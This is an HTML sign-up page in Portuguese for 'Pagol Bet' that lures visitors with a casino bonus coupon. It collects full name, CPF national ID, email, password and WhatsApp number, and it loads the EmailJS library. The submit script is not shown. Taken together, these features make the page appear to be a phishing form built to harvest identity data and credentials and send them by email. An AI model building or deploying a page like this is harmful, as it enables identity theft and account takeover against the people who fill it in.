<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="icon_180x180.png" type="image/png">
    <title>Cadastro | Bônus Cassino | Pagol Bet</title>
    <link rel="stylesheet" href="styles.css">
    <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>
</head>
<body>
    <header>
        <img src="logotype.webp" alt="Logo">
    </header>
    <div class="banner">
        <img src="banner.png" alt="Banner">
    </div>
    <div class="form-container">
        <form id="registrationForm">
            <p><b>Complete</b> seu cadastro para resgatar o <b>BÔNUS</b></p>
            <input type="text" id="name" name="name" placeholder="* Nome Completo" required>
            <input type="tel" id="cpf" maxlength="14" name="cpf" placeholder="* CPF" required>
            <input type="email" id="email" name="email" placeholder="* E-mail" required>
            <input type="password" id="password" name="password" placeholder="* Senha" required>
            <input type="tel" name="phone" maxlength="15" id="phone" placeholder="* Número / WhatsApp" required>
            <p1>CUPOM</p1>
            <input type="text" name="cupom" id="cupom" placeholder="CUPOM" value="✔️ 50-RODADAS-VIP" readonly>
            <button type="submit">Cadastrar</button>

            <p2>Ao se cadastrar você confirma que tem 18 anos ou mais.</p2>


        </form>

    </div>
    <script src="scripts.js"></script>
</body>
</html>
